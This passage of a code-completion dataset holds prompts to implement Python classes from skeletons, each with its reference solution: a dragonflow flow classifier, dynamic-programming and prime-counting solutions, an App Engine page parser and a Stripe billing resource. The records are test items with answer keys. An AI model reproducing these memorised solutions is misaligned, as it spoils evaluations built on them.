the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.", "name": "is_classification_local", "signature": "def is_classification_local(self)"}, {"docstring": "Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.", "name": "is_dispatch_local", "signature": "def is_dispatch_local(self)"}, {"docstring": "Make sure exactly one of {source_port, dest_port} is set", "name": "validate", "signature": "def validate(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002254", "prompt": "Implement the Python class `FlowClassifier` described below.\n\nClass description:\nImplement the FlowClassifier class.\n\nMethod signatures and docstrings:\n- def is_classification_local(self): Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\n- def is_dispatch_local(self): Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\n- def validate(self): Make sure exactly one of {source_port, dest_port} is set", "prompted_full_text": "Implement the Python class `FlowClassifier` described below.\n\nClass description:\nImplement the FlowClassifier class.\n\nMethod signatures and docstrings:\n- def is_classification_local(self): Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\n- def is_dispatch_local(self): Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\n- def validate(self): Make sure exactly one of {source_port, dest_port} is set\n\n<|skeleton|>\nclass FlowClassifier:\n\n def is_classification_local(self):\n \"\"\"Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\"\"\"\n <|body_0|>\n\n def is_dispatch_local(self):\n \"\"\"Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\"\"\"\n <|body_1|>\n\n def validate(self):\n \"\"\"Make sure exactly one of {source_port, dest_port} is set\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.source_port is not None:\n return self.source_port.is_local\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dest_port is not None:\n return self.dest_port.is_local\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n super(FlowClassifier, self).validate()\n if self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\n elif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')\n<|end_body_2|>\n", "revision_id": "0f154d4f794b02ac5b7fd61a3417d89e7b10912d", "skeleton": "<|skeleton|>\nclass FlowClassifier:\n\n def is_classification_local(self):\n \"\"\"Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\"\"\"\n <|body_0|>\n\n def is_dispatch_local(self):\n \"\"\"Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\"\"\"\n <|body_1|>\n\n def validate(self):\n \"\"\"Make sure exactly one of {source_port, dest_port} is set\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FlowClassifier:\n def is_classification_local(self):\n \"\"\"Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\"\"\"\n if self.source_port is not None:\n return self.source_port.is_local\n return True\n\n def is_dispatch_local(self):\n \"\"\"Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\"\"\"\n if self.dest_port is not None:\n return self.dest_port.is_local\n return True\n\n def validate(self):\n \"\"\"Make sure exactly one of {source_port, dest_port} is set\"\"\"\n super(FlowClassifier, self).validate()\n if self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\n elif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')\n", "source": "the_stack_v2_python_sparse", "source_path": "dragonflow/db/models/sfc.py", "source_repo": "qianyuqiao/dragonflow", "split": "test", "star_events_count": 0} {"blob_id": "585e33f6e035ea3d15fdfe9a6e74caf5c2dfb9d1", "bodies": ["n = len(s)\ns_ = s[::-1]\ndp = [[0] * (n + 1) for _ in range(n + 1)]\nfor i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\nreturn n - dp[-1][-1]", "n = len(s)\ndp = [[0] * n for _ in range(n)]\nfor span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\nreturn dp[0][n - 1]"], "bodies_text": "<|body_start_0|>\n n = len(s)\n s_ = s[::-1]\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\n return n - dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n dp = [[0] * n for _ in range(n)]\n for span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\n return dp[0][n - 1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def minInsertions1(self, s: str) -> int:\n \"\"\"思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\"\"\"\n <|body_0|>\n\n def minInsertions2(self, s: str) -> int:\n \"\"\"思路:区间dp @param s: @return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n s_ = s[::-1]\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\n return n - dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n dp = [[0] * n for _ in range(n)]\n for span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\n return dp[0][n - 1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000285", "length_bytes": 2224, "license_type": "no_license", "methods": [{"docstring": "思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:", "name": "minInsertions1", "signature": "def minInsertions1(self, s: str) -> int"}, {"docstring": "思路:区间dp @param s: @return:", "name": "minInsertions2", "signature": "def minInsertions2(self, s: str) -> int"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002392", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minInsertions1(self, s: str) -> int: 思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\n- def minInsertions2(self, s: str) -> int: 思路:区间dp @param s: @return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def minInsertions1(self, s: str) -> int: 思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\n- def minInsertions2(self, s: str) -> int: 思路:区间dp @param s: @return:\n\n<|skeleton|>\nclass Solution:\n\n def minInsertions1(self, s: str) -> int:\n \"\"\"思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\"\"\"\n <|body_0|>\n\n def minInsertions2(self, s: str) -> int:\n \"\"\"思路:区间dp @param s: @return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(s)\n s_ = s[::-1]\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\n return n - dp[-1][-1]\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(s)\n dp = [[0] * n for _ in range(n)]\n for span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\n return dp[0][n - 1]\n<|end_body_1|>\n", "revision_id": "e43ee86c5a8cdb808da09b4b6138e10275abadb5", "skeleton": "<|skeleton|>\nclass Solution:\n\n def minInsertions1(self, s: str) -> int:\n \"\"\"思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\"\"\"\n <|body_0|>\n\n def minInsertions2(self, s: str) -> int:\n \"\"\"思路:区间dp @param s: @return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def minInsertions1(self, s: str) -> int:\n \"\"\"思路:动态规划法 1. s翻转后s_,两者求最长公共子序列,剩余的则是要插入的 @param s: @return:\"\"\"\n n = len(s)\n s_ = s[::-1]\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for i in range(n):\n for j in range(n):\n if s[i] == s_[j]:\n dp[i + 1][j + 1] = dp[i][j] + 1\n else:\n dp[i + 1][j + 1] = max(dp[i + 1][j], dp[i][j + 1])\n return n - dp[-1][-1]\n\n def minInsertions2(self, s: str) -> int:\n \"\"\"思路:区间dp @param s: @return:\"\"\"\n n = len(s)\n dp = [[0] * n for _ in range(n)]\n for span in range(2, n + 1):\n for l in range(n - span + 1):\n r = l + span - 1\n if s[l] == s[r]:\n dp[l][r] = dp[l + 1][r - 1]\n else:\n dp[l][r] = min(dp[l + 1][r], dp[l][r - 1]) + 1\n return dp[0][n - 1]\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/动态规划法(dp)/1312. 让字符串成为回文串的最少插入次数.py", "source_repo": "yiming1012/MyLeetCode", "split": "test", "star_events_count": 2} {"blob_id": "403b4b9ba23ba10354f7848c7a985f2d35c59b54", "bodies": ["selector = '#ae-appbar-version-id option[selected=\"selected\"]'\nversion_element, = self.doc.cssselect(selector)\nreturn version_element.text.strip()", "details = []\nselector = '#ae-instances-details-table tbody tr'\nfor element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\nreturn details"], "bodies_text": "<|body_start_0|>\n selector = '#ae-appbar-version-id option[selected=\"selected\"]'\n version_element, = self.doc.cssselect(selector)\n return version_element.text.strip()\n<|end_body_0|>\n\n<|body_start_1|>\n details = []\n selector = '#ae-instances-details-table tbody tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\n return details\n<|end_body_1|>\n", "class_docstring": "An API for the contents of /instances as structured data.", "class_name": "Instances", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Instances:\n \"\"\"An API for the contents of /instances as structured data.\"\"\"\n\n def version(self):\n \"\"\"The app version that owns these instances.\"\"\"\n <|body_0|>\n\n def raw_detail_dicts(self):\n \"\"\"Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n selector = '#ae-appbar-version-id option[selected=\"selected\"]'\n version_element, = self.doc.cssselect(selector)\n return version_element.text.strip()\n<|end_body_0|>\n\n<|body_start_1|>\n details = []\n selector = '#ae-instances-details-table tbody tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\n return details\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000286", "length_bytes": 15505, "license_type": "no_license", "methods": [{"docstring": "The app version that owns these instances.", "name": "version", "signature": "def version(self)"}, {"docstring": "Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]", "name": "raw_detail_dicts", "signature": "def raw_detail_dicts(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005493", "prompt": "Implement the Python class `Instances` described below.\n\nClass description:\nAn API for the contents of /instances as structured data.\n\nMethod signatures and docstrings:\n- def version(self): The app version that owns these instances.\n- def raw_detail_dicts(self): Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]", "prompted_full_text": "Implement the Python class `Instances` described below.\n\nClass description:\nAn API for the contents of /instances as structured data.\n\nMethod signatures and docstrings:\n- def version(self): The app version that owns these instances.\n- def raw_detail_dicts(self): Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\n\n<|skeleton|>\nclass Instances:\n \"\"\"An API for the contents of /instances as structured data.\"\"\"\n\n def version(self):\n \"\"\"The app version that owns these instances.\"\"\"\n <|body_0|>\n\n def raw_detail_dicts(self):\n \"\"\"Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n selector = '#ae-appbar-version-id option[selected=\"selected\"]'\n version_element, = self.doc.cssselect(selector)\n return version_element.text.strip()\n<|end_body_0|>\n\n<|body_start_1|>\n details = []\n selector = '#ae-instances-details-table tbody tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\n return details\n<|end_body_1|>\n", "revision_id": "c4ad2ad67b497ce411a9e5d6d6db407ee304491f", "skeleton": "<|skeleton|>\nclass Instances:\n \"\"\"An API for the contents of /instances as structured data.\"\"\"\n\n def version(self):\n \"\"\"The app version that owns these instances.\"\"\"\n <|body_0|>\n\n def raw_detail_dicts(self):\n \"\"\"Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Instances:\n \"\"\"An API for the contents of /instances as structured data.\"\"\"\n\n def version(self):\n \"\"\"The app version that owns these instances.\"\"\"\n selector = '#ae-appbar-version-id option[selected=\"selected\"]'\n version_element, = self.doc.cssselect(selector)\n return version_element.text.strip()\n\n def raw_detail_dicts(self):\n \"\"\"Performance statistics specific to each instance. Returns: A list of dicts with (as of App Engine 1.7.2) fields like this: [{'instance_id': '01c61b117c08b2b562c94f26f43f9b04f6775180', 'qps': '1.183', 'latency': '208.5 ms', 'requests': 14628, 'errors': 5, 'age': '9:07:52', 'memory': '184.8 MBytes'}, ... ]\"\"\"\n details = []\n selector = '#ae-instances-details-table tbody tr'\n for element in self.doc.cssselect(selector):\n children = list(element)\n assert len(children) == 9, [child.text for child in children]\n details.append({'instance_id': element.attrib['id'].strip(), 'qps': children[0].text.strip(), 'latency': children[1].text.strip(), 'requests': children[2].text.strip(), 'errors': children[3].text.strip(), 'age': children[4].text.strip(), 'memory': children[5].text.strip()})\n return details\n", "source": "the_stack_v2_python_sparse", "source_path": "src/gae_dashboard/parsers.py", "source_repo": "summer-liu/analytics", "split": "test", "star_events_count": 1} {"blob_id": "2b05cca085cf68b03e50d64f62caa55a46390e11", "bodies": ["if n < 3:\n return 0\nprimes = [False] * n\ncount = n / 2\ni = 3\nwhile i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\nreturn count", "if n < 3:\n return 0\nif n == 3:\n return 1\nprimes = [2]\nfor i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\nreturn primes"], "bodies_text": "<|body_start_0|>\n if n < 3:\n return 0\n primes = [False] * n\n count = n / 2\n i = 3\n while i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\n return count\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 3:\n return 0\n if n == 3:\n return 1\n primes = [2]\n for i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\n return primes\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def countPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def allPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if n < 3:\n return 0\n primes = [False] * n\n count = n / 2\n i = 3\n while i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\n return count\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 3:\n return 0\n if n == 3:\n return 1\n primes = [2]\n for i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\n return primes\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000287", "length_bytes": 1571, "license_type": "no_license", "methods": [{"docstring": ":type n: int :rtype: int", "name": "countPrimes", "signature": "def countPrimes(self, n)"}, {"docstring": ":type n: int :rtype: int", "name": "allPrimes", "signature": "def allPrimes(self, n)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001623", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def countPrimes(self, n): :type n: int :rtype: int\n- def allPrimes(self, n): :type n: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def countPrimes(self, n): :type n: int :rtype: int\n- def allPrimes(self, n): :type n: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def countPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def allPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if n < 3:\n return 0\n primes = [False] * n\n count = n / 2\n i = 3\n while i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\n return count\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 3:\n return 0\n if n == 3:\n return 1\n primes = [2]\n for i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\n return primes\n<|end_body_1|>\n", "revision_id": "33c623f226981942780751554f0593f2c71cf458", "skeleton": "<|skeleton|>\nclass Solution:\n\n def countPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def allPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def countPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if n < 3:\n return 0\n primes = [False] * n\n count = n / 2\n i = 3\n while i * i < n:\n if not primes[i]:\n j = i * i\n while j < n:\n if not primes[j]:\n count -= 1\n primes[j] = True\n j += 2 * i\n i += 2\n return count\n\n def allPrimes(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if n < 3:\n return 0\n if n == 3:\n return 1\n primes = [2]\n for i in xrange(3, n, 2):\n upper_bound = int(i ** 0.5)\n is_prime = True\n for prime in primes:\n if prime > upper_bound:\n break\n if i % prime == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(i)\n return primes\n", "source": "the_stack_v2_python_sparse", "source_path": "math/leetcode_Count_Primes.py", "source_repo": "monkeylyf/interviewjam", "split": "test", "star_events_count": 59} {"blob_id": "e96945fababa77d483574550ab01855da9d66d98", "bodies": ["permission = AdministerOrganizationPermission(orgname)\nif permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\nraise Unauthorized()", "permission = AdministerOrganizationPermission(orgname)\nif permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\nraise Unauthorized()", "cus = None\npermission = AdministerOrganizationPermission(orgname)\nif permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\nraise Unauthorized()"], "bodies_text": "<|body_start_0|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n success_url = request_data.get('success_url')\n cancel_url = request_data.get('cancel_url')\n if not success_url or not cancel_url:\n raise InvalidRequest()\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n try:\n cus = billing.Customer.create(email=organization.email)\n organization.stripe_id = cus.id\n organization.save()\n except stripe.error.APIConnectionError as e:\n return connection_response(e)\n try:\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n checkout_session = stripe.checkout.Session.create(line_items=[{'price': price['stripeId'], 'quantity': 1}], customer=organization.stripe_id, subscription_data={'metadata': {'kind': 'account_change_plan', 'namespace': organization.username, 'performer': get_authenticated_user().username, 'ip': get_request_ip(), 'plan': price['stripeId']}}, mode='subscription', success_url=success_url, cancel_url=cancel_url)\n return checkout_session\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n except Exception as e:\n abort(500, message=str(e))\n raise Unauthorized()\n<|end_body_0|>\n\n<|body_start_1|>\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n request_data = request.get_json()\n plan = request_data['plan']\n organization = model.organization.get_organization(orgname)\n if not organization.stripe_id:\n raise InvalidRequest()\n price = get_price(plan, True)\n if not price:\n abort(404, message='Plan not found')\n return change_subscription(organization, price)\n raise Unauthorized()\n<|end_body_1|>\n\n<|body_start_2|>\n cus = None\n permission = AdministerOrganizationPermission(orgname)\n if permission.can():\n private_repos = model.user.get_private_repo_count(orgname)\n organization = model.organization.get_organization(orgname)\n if organization.stripe_id:\n try:\n cus = billing.Customer.retrieve(organization.stripe_id)\n except stripe.error.APIConnectionError as e:\n abort(503, message='Cannot contact Stripe')\n if cus.subscription:\n return subscription_view(cus.subscription, private_repos)\n return {'hasSubscription': False, 'isExistingCustomer': cus is not None, 'plan': 'free', 'usedPrivateRepos': private_repos}\n raise Unauthorized()\n<|end_body_2|>\n", "class_docstring": "Resource for managing a org's subscription.", "class_name": "OrganizationPlan", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OrganizationPlan:\n \"\"\"Resource for managing a org's subscription.\"\"\"\n\n def post(self, orgname):\n \"\"\"Create the org's subscription. Returns a Stripe checkout session.\"\"\"\n <|body_0|>\n\n def put(self, orgname):\n \"\"\"Update the org's subscription.\"\"\"\n <|body_1|>\n\n def get(self, orgname):\n \"\"\"Fetch any existing subscription for the org.\"\"\"\n 